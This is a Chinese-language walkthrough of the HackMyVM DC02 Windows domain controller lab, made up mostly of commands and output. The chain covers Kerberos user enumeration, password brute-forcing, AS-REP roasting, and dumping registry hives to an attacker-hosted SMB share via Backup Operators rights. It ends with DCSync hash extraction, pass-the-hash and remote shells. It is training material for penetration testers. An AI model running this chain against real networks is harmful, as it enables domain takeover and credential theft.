HackMyVm DC02 Walkthrough

这是个win系统靶机,下载地址为https://hackmyvm.eu/machines/machine.php?vm=DC02。
借助这篇文章,记录win靶机一些常见操作,厘清一些基本概念。

首先扫描端口。

└─$ nmap -sV -sC -Pn -p- -oN port.log 192.168.56.126
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-03 09:33 CST
Nmap scan report for 192.168.56.126
Host is up (0.00041s latency).
Not shown: 65518 filtered tcp ports (no-response)
PORT      STATE SERVICE      VERSION
53/tcp    open  domain?
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-03 16:35:38Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap
445/tcp   open  tcpwrapped
464/tcp   open  tcpwrapped
593/tcp   open  tcpwrapped
636/tcp   open  tcpwrapped
3268/tcp  open  tcpwrapped
3269/tcp  open  tcpwrapped
5985/tcp  open  tcpwrapped
9389/tcp  open  tcpwrapped
49664/tcp open  tcpwrapped
49667/tcp open  tcpwrapped
49676/tcp open  tcpwrapped
49689/tcp open  tcpwrapped
MAC Address: 08:00:27:71:A5:0D (Oracle VirtualBox virtual NIC)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-11-03T16:37:48
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:71:a5:0d (Oracle VirtualBox virtual NIC)
|_clock-skew: 14h59m57s

接下来进行一些常见的信息收集,首先是smb和winrm。

└─$ netexec winrm $IP                                                     
WINRM       192.168.56.126  5985   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:SOUPEDECODE.LOCAL)

┌──(kali㉿mykali)-[~/Documents/dc02]
└─$ netexec smb $IP                                                    
SMB         192.168.56.126  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)

smb服务是开着的。根据信息,将SOUPEDECODE.LOCAL加入hosts。再看一下ldap信息。

└─$ ldapsearch -x -H ldap://$IP -s base                                                                                                                                       
...
rootDomainNamingContext: DC=SOUPEDECODE,DC=LOCAL                                                                                                                              
ldapServiceName: SOUPEDECODE.LOCAL:dc01$@SOUPEDECODE.LOCAL                                                                                                                    
isGlobalCatalogReady: TRUE                                   

比较关键的就是dc01用户运行着ldap服务。接下来看88端口的kerberos信息,尝试爆破出用户名。

└─$ kerbrute_linux_amd64 userenum --dc $IP -d SOUPEDECODE.LOCAL /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt 

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 11/03/24 - Ronnie Flathers @ropnop

2024/11/03 09:55:36 >  Using KDC(s):
2024/11/03 09:55:36 >   192.168.56.126:88

2024/11/03 09:55:36 >  [+] VALID USERNAME:       admin@SOUPEDECODE.LOCAL
2024/11/03 09:55:36 >  [+] VALID USERNAME:       charlie@SOUPEDECODE.LOCAL
2024/11/03 09:55:36 >  [+] VALID USERNAME:       Charlie@SOUPEDECODE.LOCAL
2024/11/03 09:55:36 >  [+] VALID USERNAME:       administrator@SOUPEDECODE.LOCAL
2024/11/03 09:55:36 >  [+] VALID USERNAME:       Admin@SOUPEDECODE.LOCAL
2024/11/03 09:55:38 >  [+] VALID USERNAME:       Administrator@SOUPEDECODE.LOCAL
2024/11/03 09:55:38 >  [+] VALID USERNAME:       CHARLIE@SOUPEDECODE.LOCAL
2024/11/03 09:55:46 >  [+] VALID USERNAME:       ADMIN@SOUPEDECODE.LOCAL
2024/11/03 09:57:23 >  [+] VALID USERNAME:       wreed11@SOUPEDECODE.LOCAL
...

除了admin之外,还有charlie用户、wreed11用户等等。从charlie用户入手,发现可以登录smb,并爆破出密码。

└─$ netexec smb $IP -u 'charlie' -p /usr/share/wordlists/rockyou.txt --ignore-pw-decoding
SMB         192.168.56.126  445    DC01             [+] SOUPEDECODE.LOCAL\charlie:charlie

└─$ smbclient -L $IP -U charlie%charlie   

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
...

利用charlie用户,可以得到zximena448用户名没有开启预身份验证。

└─$ impacket-GetNPUsers SOUPEDECODE.LOCAL/charlie:charlie
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Name        MemberOf                                                PasswordLastSet             LastLogon                   UAC      
----------  ------------------------------------------------------  --------------------------  --------------------------  --------
zximena448  CN=Backup Operators,CN=Builtin,DC=SOUPEDECODE,DC=LOCAL  2024-06-18 02:09:53.417046  2024-07-06 07:51:16.071116  0x410200

这样,就可以获取zximena448用户的密码hash。

└─$ impacket-GetNPUsers SOUPEDECODE.LOCAL/zximena448 -no-pass                               
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Getting TGT for zximena448
/usr/share/doc/python3-impacket/examples/GetNPUsers.py:165: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
$krb5asrep$23$zximena448@SOUPEDECODE.LOCAL:7c0c2e49144c8b04b1a61d848211bf9c$5e863606cc53cd96d42e34338f51a85eef37682b6fb04d948c715cdee322faf33ed51a2f505d57bf8f4561af97a49cc47da72b4884b6d21bcd85fb1ed6ca4d386c9b1e164f5775c919b5e581a4a89826b95db518e581b75201f73781fbf9bf1f0413fe5e43b37bf26e7fdb95e3261e9e41f96ac6bd9c5a7389f9fa483f7e665a5f11a73c9d88542288e34d895a0ac8b3f8467606e95e213173483f3e21823e71a15a60ff54c8c27db0fb6f02e331eaaaa4bfd3629d7e17c9ecdcf38c80d25383058e60808e6f7afa398fc05671b0a69c44d782157e99783c28445bd640a15e7d5e752dd037355881bf590e8513fcbad5f7956c9075f0

对这个hash进行爆破,可以得到密码明文。

└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt      
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 SSE2 4x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
internet         ($krb5asrep$23$zximena448@SOUPEDECODE.LOCAL)     
1g 0:00:00:00 DONE (2024-11-03 10:17) 33.33g/s 17066p/s 17066c/s 17066C/s angelo..letmein
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

使用 zximena448登录smb服务,就可以在Desktop目录下得到user flag。

└─$ smbclient //$IP/C$ -U zximena448%internet
Try "help" to get a list of possible commands.
smb: \> dir
  $WinREAgent                        DH        0  Sun Jun 16 03:19:51 2024
  Documents and Settings          DHSrn        0  Sun Jun 16 10:51:08 2024
  DumpStack.log.tmp                 AHS    12288  Mon Nov  4 00:21:48 2024
  pagefile.sys                      AHS 1476395008  Mon Nov  4 00:21:48 2024
  PerfLogs                            D        0  Sat May  8 16:15:05 2021
  Program Files                      DR        0  Sun Jun 16 01:54:31 2024
  Program Files (x86)                 D        0  Sat May  8 17:34:13 2021
  ProgramData                       DHn        0  Sun Jun 16 10:51:08 2024
  Recovery                         DHSn        0  Sun Jun 16 10:51:08 2024
  System Volume Information         DHS        0  Sun Jun 16 03:02:21 2024
  Users                              DR        0  Tue Jun 18 02:31:08 2024
  Windows                             D        0  Sun Jun 16 03:21:10 2024

smb: \Users\zximena448\Desktop\> dir
  .                                  DR        0  Tue Jun 18 02:31:24 2024
  ..                                  D        0  Tue Jun 18 02:30:22 2024
  desktop.ini                       AHS      282  Tue Jun 18 02:30:22 2024
  user.txt                            A       33  Thu Jun 13 04:01:30 2024

                12942591 blocks of size 4096. 10913652 blocks available

接下来,利用zximena448用户,将域信息导出。常见的域信息有如下内容:

用户列表:提取所有域用户,包含用户名、描述、账户属性(如是否启用)等信息。
组信息:提取域中的所有组,以及每个组的成员。
计算机列表:列出域中所有的计算机(工作站和服务器),包括其主机名、操作系统等信息。
组策略对象(GPOs):提取和显示域内的组策略对象及其关联。
信任关系:如果存在域信任关系,则显示域信任信息。
域控制器信息:包括域控制器的 IP 地址、操作系统版本等。

└─$ ldapdomaindump -u SOUPEDECODE.local\\zximena448 -p internet $IP
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished

在浏览器中查看导出的domain_users.html文件,可以看出,大量用户都是批量生成的普通用户,但zximena448具有Backup Operators权限。

这时,可以利用这个权限,将系统的关键信息导出,包括SAM、SYSTEM、SECURITY。

└─$ impacket-smbserver -smb2support smbFolder .
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed                                                                                                                                                        
[*] Config file parsed
...
└─$ reg.py zximena448:internet@$IP backup -p '\\192.168.56.101\smbFolder\'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Dumping SAM hive to \\192.168.56.101\smbFolder\\SAM
Dumping SYSTEM hive to \\192.168.56.101\smbFolder\\SYSTEM
Dumping SECURITY hive to \\192.168.56.101\smbFolder\\SECURITY
...
[*] Incoming connection (192.168.56.126,49770)
[*] AUTHENTICATE_MESSAGE (\,DC01)
[*] User DC01\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:smbFolder)
[*] AUTHENTICATE_MESSAGE (SOUPEDECODE\DC01$,DC01)
[*] User DC01\DC01$ authenticated successfully
[*] DC01$::SOUPEDECODE:aaaaaaaaaaaaaaaa:beea213e79a102c0d609637cd0982bf3:010100000000000000cf99db9c2ddb016e177f1b807d40ea0000000001001000510050004e006b0076004f007400520003001000510050004e006b0076004f0074005200020010005000620063004c007a0063007a005500040010005000620063004c007a0063007a0055000700080000cf99db9c2ddb0106000400020000000800300030000000000000000000000000400000b512ab04ffe42ff4db57047761a6b5780f71145389fe422e96d4eae7e84d8b110a001000000000000000000000000000000000000900260063006900660073002f003100390032002e003100360038002e00350036002e003100300031000000000000000000
[*] AUTHENTICATE_MESSAGE (SOUPEDECODE\DC01$,DC01)
[*] User DC01\DC01$ authenticated successfully
[*] DC01$::SOUPEDECODE:aaaaaaaaaaaaaaaa:0926624770c903f5b05c8cad5fa3f009:010100000000000000cf99db9c2ddb0112769945f1d359a60000000001001000510050004e006b0076004f007400520003001000510050004e006b0076004f0074005200020010005000620063004c007a0063007a005500040010005000620063004c007a0063007a0055000700080000cf99db9c2ddb0106000400020000000800300030000000000000000000000000400000b512ab04ffe42ff4db57047761a6b5780f71145389fe422e96d4eae7e84d8b110a001000000000000000000000000000000000000900260063006900660073002f003100390032002e003100360038002e00350036002e003100300031000000000000000000
[*] AUTHENTICATE_MESSAGE (SOUPEDECODE\DC01$,DC01)
[*] User DC01\DC01$ authenticated successfully
[*] DC01$::SOUPEDECODE:aaaaaaaaaaaaaaaa:456e98d84af0512440df986dc36af2b9:010100000000000000cf99db9c2ddb01dd0c441f63795aeb0000000001001000510050004e006b0076004f007400520003001000510050004e006b0076004f0074005200020010005000620063004c007a0063007a005500040010005000620063004c007a0063007a0055000700080000cf99db9c2ddb0106000400020000000800300030000000000000000000000000400000b512ab04ffe42ff4db57047761a6b5780f71145389fe422e96d4eae7e84d8b110a001000000000000000000000000000000000000900260063006900660073002f003100390032002e003100360038002e00350036002e003100300031000000000000000000
[*] AUTHENTICATE_MESSAGE (SOUPEDECODE\DC01$,DC01)
[*] User DC01\DC01$ authenticated successfully
[*] DC01$::SOUPEDECODE:aaaaaaaaaaaaaaaa:ebee96457316fe8a30ed5890e6ec8398:0101000000000000809263dd9c2ddb0126798cb25b8ddc180000000001001000510050004e006b0076004f007400520003001000510050004e006b0076004f0074005200020010005000620063004c007a0063007a005500040010005000620063004c007a0063007a00550007000800809263dd9c2ddb0106000400020000000800300030000000000000000000000000400000b512ab04ffe42ff4db57047761a6b5780f71145389fe422e96d4eae7e84d8b110a001000000000000000000000000000000000000900260063006900660073002f003100390032002e003100360038002e00350036002e003100300031000000000000000000
[*] AUTHENTICATE_MESSAGE (SOUPEDECODE\DC01$,DC01)
[*] User DC01\DC01$ authenticated successfully
[*] DC01$::SOUPEDECODE:aaaaaaaaaaaaaaaa:b77dda4ea1fa55a045fd6f417d4b369c:0101000000000000809263dd9c2ddb0120f35a75cc68a8220000000001001000510050004e006b0076004f007400520003001000510050004e006b0076004f0074005200020010005000620063004c007a0063007a005500040010005000620063004c007a0063007a00550007000800809263dd9c2ddb0106000400020000000800300030000000000000000000000000400000b512ab04ffe42ff4db57047761a6b5780f71145389fe422e96d4eae7e84d8b110a001000000000000000000000000000000000000900260063006900660073002f003100390032002e003100360038002e00350036002e003100300031000000000000000000
[*] AUTHENTICATE_MESSAGE (SOUPEDECODE\DC01$,DC01)
[*] User DC01\DC01$ authenticated successfully
[*] DC01$::SOUPEDECODE:aaaaaaaaaaaaaaaa:8687c3932c06db0a6bcb4429785bdb32:0101000000000000809263dd9c2ddb011a66bdd51de8c4790000000001001000510050004e006b0076004f007400520003001000510050004e006b0076004f0074005200020010005000620063004c007a0063007a005500040010005000620063004c007a0063007a00550007000800809263dd9c2ddb0106000400020000000800300030000000000000000000000000400000b512ab04ffe42ff4db57047761a6b5780f71145389fe422e96d4eae7e84d8b110a001000000000000000000000000000000000000900260063006900660073002f003100390032002e003100360038002e00350036002e003100300031000000000000000000
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:smbFolder)
[*] Closing down connection (192.168.56.126,49770)
[*] Remaining connections []

上面的指令运行结束后,本地文档下多了SAM、SYSTEM和SECURITY三个文件。使用impacket脚本可以进行本地信息提取。

└─$ impacket-secretsdump LOCAL -system SYSTEM -security SECURITY -sam SAM
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x0c7ad5e1334e081c4dfecd5d77cc2fc6
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:b19e1a76c509783c5a024591ede1f8706364f37c0383a769ad80b7b5760c9db1f918086f33788749ad6d5b9bd215f044074454aa8a34c5ecbcb478059d742b3da6cbf8b2442aa94a01507c0c187065f775bb5cc9b9c68fc95eeb6119de6d0d7c0c1b3b313545663bf89b186afe35113513164dc402027b645b265f09527845dacb367fdd9e55e8ba41f1e47e629815bd1af2a92351e7a6f0916ca2bb268b95791c023fa051de08fc88a5121f19e3f6eba0e82b704da1a0811f59355f9a69f4c764131108d0d001875bdae77e40d6ac2eb9110b33959ec2a6d47dee858d77602d749e3bb4caa9e693ad523b7c2c1bc594
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:94ec82f1cf6f1656d7c5db062d802616
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x829d1c0e3b8fdffdc9c86535eac96158d8841cf4
dpapi_userkey:0x4813ee82e68a3bf9fec7813e867b42628ccd9503
[*] NL$KM 
 0000   44 C5 ED CE F5 0E BF 0C  15 63 8B 8D 2F A3 06 8F   D........c../...
 0010   62 4D CA D9 55 20 44 41  75 55 3E 85 82 06 21 14   bM..U DAuU>...!.
 0020   8E FA A1 77 0A 9C 0D A4  9A 96 44 7C FC 89 63 91   ...w......D|..c.
 0030   69 02 53 95 1F ED 0E 77  B5 24 17 BE 6E 80 A9 91   i.S....w.$..n...
NL$KM:44c5edcef50ebf0c15638b8d2fa3068f624dcad95520444175553e85820621148efaa1770a9c0da49a96447cfc896391690253951fed0e77b52417be6e80a991
[*] Cleaning up..

虽然得到了Administrator的hash,但却无法登录smb和winrm。

└─$ netexec smb $IP -u 'Administrator' -H 209c6174da490caeb422f3fa5a7ae634 
SMB         192.168.56.126  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         192.168.56.126  445    DC01             [-] SOUPEDECODE.LOCAL\Administrator:209c6174da490caeb422f3fa5a7ae634 STATUS_LOGON_FAILURE 

└─$ netexec winrm $IP -u 'Administrator' -H 209c6174da490caeb422f3fa5a7ae634
WINRM       192.168.56.126  5985   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:SOUPEDECODE.LOCAL)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       192.168.56.126  5985   DC01             [-] SOUPEDECODE.LOCAL\Administrator:209c6174da490caeb422f3fa5a7ae634

这时,关注到$MACHINE.ACC栏目下,还有一个账户hash。$MACHINE.ACC表示这是一个机器账户,在Windows域环境中,计算机账户的格式是$,而这个$符号用于区分计算机账户和普通用户账户。这里,就是前面提到的DC01$。

为了验证,可以在浏览器中打开刚才导出域信息中的domain_computers.html,看到DC01确实存在。

验证一下,该用户可以登录smb。

└─$ crackmapexec smb  $IP -u DC01$ -H 94ec82f1cf6f1656d7c5db062d802616                 
SMB         192.168.56.126  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         192.168.56.126  445    DC01             [+] SOUPEDECODE.LOCAL\DC01$:94ec82f1cf6f1656d7c5db062d80261

接下来使用impacket脚本,用DC01用户导出hash。使用脚本时,要注意-hashed参数的格式。

└─$ impacket-secretsdump -h |grep hashes
...
-hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH

上面的帮助说明,-hashes接的参数有两个hash,LMHASH为aad3b435b51404eeaad3b435b51404ee,这表示空密码。

因此,在输入实际hash时,空密码不用输入,但要保留冒号。

└─$ impacket-secretsdump 'SOUPEDECODE.LOCAL/DC01$@SOUPEDECODE.LOCAL'  -hashes :94ec82f1cf6f1656d7c5db062d802616                                                               
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies                                                                                                         

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied                                                                                            
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)                                                                                                                 
[*] Using the DRSUAPI method to get NTDS.DIT secrets                                                                                                                          
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8982babd4da89d33210779a6c5b078bd:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:fb9d84e61e78c26063aced3bf9398ef0:::
soupedecode.local\bmark0:1103:aad3b435b51404eeaad3b435b51404ee:d72c66e955a6dc0fe5e76d205a630b15:::
soupedecode.local\otara1:1104:aad3b435b51404eeaad3b435b51404ee:ee98f16e3d56881411fbd2a67a5494c6:::

这次的Administrator的hash与上次导出的不同。上次是本机密码hash,这次是域控机DC01上的密码hash。尝试登录一下,成功。

└─$ crackmapexec smb  $IP -u Administrator -H 8982babd4da89d33210779a6c5b078bd          
SMB         192.168.56.126  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         192.168.56.126  445    DC01             [+] SOUPEDECODE.LOCAL\Administrator:8982babd4da89d33210779a6c5b078bd (Pwn3d!)

└─$ crackmapexec smb  $IP -u Administrator -H 8982babd4da89d33210779a6c5b078bd -x whoami
SMB         192.168.56.126  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         192.168.56.126  445    DC01             [+] SOUPEDECODE.LOCAL\Administrator:8982babd4da89d33210779a6c5b078bd (Pwn3d!)
SMB         192.168.56.126  445    DC01             [+] Executed command 
SMB         192.168.56.126  445    DC01             soupedecode\administrator

最后就是得到shell,有两种方法。一种是通过evil-winrm。

└─$ evil-winrm -i $IP -u Administrator -H 8982babd4da89d33210779a6c5b078bd 

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
soupedecode\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir

    Directory: C:\Users\Administrator\Desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         6/12/2024   1:01 PM             33 root.txt

一种是通过wmiexec的方式。

└─$ impacket-wmiexec "Administrator@$IP" -hashes :8982babd4da89d33210779a6c5b078bd            
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
soupedecode\administrator

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注